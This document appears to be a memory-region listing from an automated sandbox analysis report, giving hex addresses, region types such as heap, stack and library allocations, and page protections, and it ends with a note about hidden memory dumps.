1D3A6750000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
6C7D000
|
stack
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
1225000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
32B0000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
1B3B58A5000
|
trusted library allocation
|
page read and write
|
||
1D9A1540000
|
direct allocation
|
page read and write
|
||
1C9E3F11000
|
heap
|
page read and write
|
||
2052EF8D000
|
heap
|
page read and write
|
||
24667471000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
2052EFA4000
|
heap
|
page read and write
|
||
2464FD90000
|
trusted library allocation
|
page read and write
|
||
2464D0CA000
|
heap
|
page read and write
|
||
24667491000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
20531D30000
|
direct allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
2ED71402000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
1D38E7EE000
|
trusted library allocation
|
page read and write
|
||
1CA58597000
|
heap
|
page read and write
|
||
1CA585AD000
|
heap
|
page read and write
|
||
1D38C399000
|
heap
|
page read and write
|
||
1D3A6BA0000
|
trusted library allocation
|
page read and write
|
||
1D3A6711000
|
trusted library allocation
|
page read and write
|
||
1B3CD208000
|
heap
|
page read and write
|
||
1D9A15C0000
|
direct allocation
|
page read and write
|
||
24667470000
|
trusted library section
|
page read and write
|
||
7FFEBCA80000
|
trusted library allocation
|
page read and write
|
||
1D3A6B20000
|
trusted library allocation
|
page read and write
|
||
1B3CCF4F000
|
heap
|
page read and write
|
||
1D3A5E2E000
|
heap
|
page read and write
|
||
F73E17E000
|
stack
|
page read and write
|
||
1D99E805000
|
heap
|
page read and write
|
||
1D99E82D000
|
heap
|
page read and write
|
||
1CA5850F000
|
heap
|
page read and write
|
||
2464D0C2000
|
heap
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC7A0000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
3340000
|
heap
|
page execute and read and write
|
||
5C0E000
|
stack
|
page read and write
|
||
20531BF0000
|
direct allocation
|
page read and write
|
||
5FA0000
|
trusted library allocation
|
page read and write
|
||
16F323B000
|
stack
|
page read and write
|
||
246674A1000
|
trusted library allocation
|
page read and write
|
||
2052EFB2000
|
heap
|
page read and write
|
||
7FFEBC960000
|
trusted library allocation
|
page execute and read and write
|
||
2F4E000
|
stack
|
page read and write
|
||
2521A058000
|
heap
|
page read and write
|
||
1B3B2E53000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
170BF888000
|
heap
|
page read and write
|
||
246674A1000
|
trusted library allocation
|
page read and write
|
||
246678A0000
|
trusted library allocation
|
page read and write
|
||
1CA57A52000
|
heap
|
page read and write
|
||
1D9A15E0000
|
direct allocation
|
page read and write
|
||
7FFEBCC10000
|
trusted library allocation
|
page read and write
|
||
713E000
|
stack
|
page read and write
|
||
7FFEBCB53000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
2052EF3F000
|
heap
|
page read and write
|
||
1CA58402000
|
heap
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
5F90000
|
trusted library allocation
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
2938AA7C000
|
heap
|
page read and write
|
||
1D3A6741000
|
trusted library allocation
|
page read and write
|
||
1CA57AAC000
|
heap
|
page read and write
|
||
1D3A6BB0000
|
trusted library allocation
|
page read and write
|
||
1D99E807000
|
heap
|
page read and write
|
||
121AB280000
|
heap
|
page read and write
|
||
1CA57AAE000
|
heap
|
page read and write
|
||
A8C36BE000
|
stack
|
page read and write
|
||
14F3000
|
trusted library allocation
|
page execute and read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1C9E2063000
|
heap
|
page read and write
|
||
7FFEBCA00000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
1C9E3EF4000
|
heap
|
page read and write
|
||
2B019DA0000
|
heap
|
page read and write
|
||
2466705C000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
7FFEBC932000
|
trusted library allocation
|
page read and write
|
||
20531C3D000
|
direct allocation
|
page read and write
|
||
7FFEBCBF0000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
B98E17E000
|
stack
|
page read and write
|
||
7FFEBC7AB000
|
trusted library allocation
|
page read and write
|
||
1D99E7BC000
|
heap
|
page read and write
|
||
2052EF7B000
|
heap
|
page read and write
|
||
1D99E7E7000
|
heap
|
page read and write
|
||
1D38C430000
|
heap
|
page read and write
|
||
2464E945000
|
heap
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
2938AA49000
|
heap
|
page read and write
|
||
1CA57A51000
|
heap
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1C9E3DC5000
|
heap
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC870000
|
trusted library allocation
|
page execute and read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
7FFEBC8D0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEBC9C0000
|
trusted library allocation
|
page read and write
|
||
246674E0000
|
trusted library allocation
|
page read and write
|
||
2ED70C88000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB40000
|
trusted library allocation
|
page read and write
|
||
2ED70D13000
|
heap
|
page read and write
|
||
1B3CD213000
|
heap
|
page read and write
|
||
A1A818B000
|
stack
|
page read and write
|
||
170BF88A000
|
heap
|
page read and write
|
||
1D3A679C000
|
trusted library allocation
|
page read and write
|
||
1C9E3F0F000
|
heap
|
page read and write
|
||
2EA0000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
7F740000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEBCC80000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9A0000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
611E000
|
stack
|
page read and write
|
||
7FFEBCB78000
|
trusted library allocation
|
page read and write
|
||
1D9A1520000
|
direct allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
7FFEBCC40000
|
trusted library allocation
|
page read and write
|
||
2465EBD1000
|
trusted library allocation
|
page read and write
|
||
24667540000
|
heap
|
page read and write
|
||
2B019E47000
|
heap
|
page read and write
|
||
24666FF2000
|
heap
|
page read and write
|
||
1CA57ADB000
|
heap
|
page read and write
|
||
2464CF00000
|
heap
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
2405A8C5000
|
heap
|
page read and write
|
||
1D3A6B10000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1C9E2076000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1CA57A13000
|
heap
|
page read and write
|
||
1B3B5851000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D3A62C0000
|
trusted library allocation
|
page read and write
|
||
1D9A1480000
|
direct allocation
|
page read and write
|
||
1CA579A0000
|
trusted library allocation
|
page read and write
|
||
1B3B5878000
|
trusted library allocation
|
page read and write
|
||
1C9E205D000
|
heap
|
page read and write
|
||
2938A900000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
5E50000
|
trusted library allocation
|
page read and write
|
||
144A000
|
heap
|
page read and write
|
||
1D9A0113000
|
direct allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCC70000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1B3B589F000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA70000
|
trusted library allocation
|
page read and write
|
||
7FFEBC794000
|
trusted library allocation
|
page read and write
|
||
1B3B2ECB000
|
heap
|
page read and write
|
||
1D38C364000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
5860000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9D0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCBD0000
|
trusted library allocation
|
page read and write
|
||
AB296FE000
|
stack
|
page read and write
|
||
1CA57AF5000
|
heap
|
page read and write
|
||
1CA58A02000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
7FFEBCBC0000
|
trusted library allocation
|
page read and write
|
||
24667840000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
trusted library allocation
|
page read and write
|
||
170BF886000
|
heap
|
page read and write
|
||
20531B10000
|
direct allocation
|
page read and write
|
||
FB9000
|
stack
|
page read and write
|
||
1D3A67D0000
|
trusted library allocation
|
page read and write
|
||
1D3A62E0000
|
trusted library allocation
|
page read and write
|
||
170BF888000
|
heap
|
page read and write
|
||
6280000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
2E94000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D39DE30000
|
trusted library allocation
|
page read and write
|
||
2052EF7A000
|
heap
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
2052EFA1000
|
heap
|
page read and write
|
||
2B019E4C000
|
heap
|
page read and write
|
||
5F90000
|
trusted library allocation
|
page read and write
|
||
2052EF87000
|
heap
|
page read and write
|
||
1D38C1A0000
|
heap
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D99E7CB000
|
heap
|
page read and write
|
||
2521A052000
|
heap
|
page read and write
|
||
1D99E808000
|
heap
|
page read and write
|
||
1D3A6790000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
170BF888000
|
heap
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
1D99E80A000
|
heap
|
page read and write
|
||
1B3B2E0E000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
16F2D7E000
|
stack
|
page read and write
|
||
2052EF35000
|
heap
|
page read and write
|
||
2B019E4B000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCC00000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
1CA57B02000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1D99E818000
|
heap
|
page read and write
|
||
7FFEBCAA0000
|
trusted library allocation
|
page read and write
|
||
1CA57A5A000
|
heap
|
page read and write
|
||
6F3E000
|
stack
|
page read and write
|
||
1D9A1340000
|
direct allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
2464D320000
|
heap
|
page read and write
|
||
17F303B6000
|
heap
|
page read and write
|
||
1D38C530000
|
heap
|
page read and write
|
||
1D99E7AB000
|
heap
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1B3B49F0000
|
trusted library allocation
|
page read and write
|
||
25219F90000
|
heap
|
page read and write
|
||
24667130000
|
trusted library allocation
|
page read and write
|
||
1D99E7AB000
|
heap
|
page read and write
|
||
D9EF8F000
|
stack
|
page read and write
|
||
2ED70C8A000
|
heap
|
page read and write
|
||
2B019E13000
|
heap
|
page read and write
|
||
1D99E7D9000
|
heap
|
page read and write
|
||
17F30690000
|
heap
|
page read and write
|
||
1CA58A02000
|
heap
|
page read and write
|
||
2B019E48000
|
heap
|
page read and write
|
||
7FFEBCAD0000
|
trusted library allocation
|
page read and write
|
||
1C9E4310000
|
heap
|
page read and write
|
||
40E000
|
remote allocation
|
page execute and read and write
|
||
1B3B49F0000
|
trusted library allocation
|
page read and write
|
||
17F303C2000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
2938A790000
|
heap
|
page read and write
|
||
642E000
|
stack
|
page read and write
|
||
2EF0000
|
trusted library allocation
|
page execute and read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
1D3A6B40000
|
trusted library allocation
|
page read and write
|
||
2052EFAA000
|
heap
|
page read and write
|
||
1D3A67C0000
|
trusted library allocation
|
page read and write
|
||
73D0000
|
trusted library allocation
|
page read and write
|
||
2ED70C13000
|
heap
|
page read and write
|
||
7FFEBCAB0000
|
trusted library allocation
|
page read and write
|
||
1B3B2DA0000
|
trusted library allocation
|
page read and write
|
||
246674D0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC793000
|
trusted library allocation
|
page execute and read and write
|
||
33A9000
|
trusted library allocation
|
page read and write
|
||
1D99E7C6000
|
heap
|
page read and write
|
||
1C9E3F24000
|
heap
|
page read and write
|
||
2405A6B9000
|
heap
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1B3B4874000
|
heap
|
page read and write
|
||
2521A070000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
24667520000
|
trusted library allocation
|
page read and write
|
||
2938AA69000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9C5000
|
trusted library allocation
|
page read and write
|
||
2464D12E000
|
heap
|
page read and write
|
||
1B3B4A00000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
2052EE70000
|
heap
|
page read and write
|
||
16F2EBE000
|
stack
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
7FFEBC94C000
|
trusted library allocation
|
page read and write
|
||
1D38C4F0000
|
trusted library allocation
|
page read and write
|
||
17F303B7000
|
heap
|
page read and write
|
||
24667130000
|
trusted library allocation
|
page read and write
|
||
1CA57A55000
|
heap
|
page read and write
|
||
1C9E3EE1000
|
heap
|
page read and write
|
||
170BF800000
|
heap
|
page read and write
|
||
1C9E3EF4000
|
heap
|
page read and write
|
||
2052EF6D000
|
heap
|
page read and write
|
||
24667500000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA30000
|
trusted library allocation
|
page read and write
|
||
1B3B49E0000
|
trusted library allocation
|
page read and write
|
||
1D99E810000
|
heap
|
page read and write
|
||
2464EBD1000
|
trusted library allocation
|
page read and write
|
||
2EC7000
|
trusted library allocation
|
page execute and read and write
|
||
1D3A6890000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D39DED7000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1B3CCF4F000
|
heap
|
page read and write
|
||
7FFEBCA00000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
1D3A67C0000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC7AB000
|
trusted library allocation
|
page read and write
|
||
6430000
|
trusted library allocation
|
page read and write
|
||
A8C353D000
|
stack
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCAF0000
|
trusted library allocation
|
page read and write
|
||
2464CF60000
|
remote allocation
|
page read and write
|
||
7FFEBCB10000
|
trusted library allocation
|
page read and write
|
||
1B3B582F000
|
trusted library allocation
|
page read and write
|
||
15BE000
|
stack
|
page read and write
|
||
5F50000
|
trusted library allocation
|
page read and write
|
||
1C9E2076000
|
heap
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
170BF88A000
|
heap
|
page read and write
|
||
1C9E3EFC000
|
heap
|
page read and write
|
||
7FFEBCA90000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
2938AA13000
|
heap
|
page read and write
|
||
F5A913E000
|
stack
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCC60000
|
trusted library allocation
|
page read and write
|
||
1D99E7DE000
|
heap
|
page read and write
|
||
1D38C460000
|
heap
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCBA6000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
2ED70C53000
|
heap
|
page read and write
|
||
1C9E3EA0000
|
heap
|
page read and write
|
||
D9F77B000
|
stack
|
page read and write
|
||
2052EF5C000
|
heap
|
page read and write
|
||
1B3B2EBB000
|
heap
|
page read and write
|
||
1D3A6B80000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
1D3A6B00000
|
trusted library allocation
|
page read and write
|
||
1C9E3EEE000
|
heap
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
2464E990000
|
trusted library allocation
|
page read and write
|
||
24667471000
|
trusted library allocation
|
page read and write
|
||
24667481000
|
trusted library allocation
|
page read and write
|
||
1C9E3F36000
|
heap
|
page read and write
|
||
2464EBB4000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
15CB0E74000
|
heap
|
page read and write
|
||
1D3A6AF0000
|
trusted library allocation
|
page read and write
|
||
1D3A6721000
|
trusted library allocation
|
page read and write
|
||
1D38E7FE000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
3270000
|
trusted library allocation
|
page read and write
|
||
1C9E1FEC000
|
heap
|
page read and write
|
||
68E274E000
|
stack
|
page read and write
|
||
17F303C7000
|
heap
|
page read and write
|
||
2B019E29000
|
heap
|
page read and write
|
||
1B3B49C0000
|
trusted library allocation
|
page read and write
|
||
17F303E5000
|
heap
|
page read and write
|
||
2938AA69000
|
heap
|
page read and write
|
||
1CA58582000
|
heap
|
page read and write
|
||
16F2EFF000
|
stack
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB30000
|
trusted library allocation
|
page read and write
|
||
12A0000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D3A6923000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
4AF8DF6000
|
stack
|
page read and write
|
||
1D3A62F0000
|
trusted library allocation
|
page read and write
|
||
2052EF8D000
|
heap
|
page read and write
|
||
1D3A6905000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
585F000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
A8C3379000
|
stack
|
page read and write
|
||
1CA585AD000
|
heap
|
page read and write
|
||
7FFEBC7CC000
|
trusted library allocation
|
page read and write
|
||
2521A108000
|
heap
|
page read and write
|
There are 2439 hidden memdumps, click here to show them.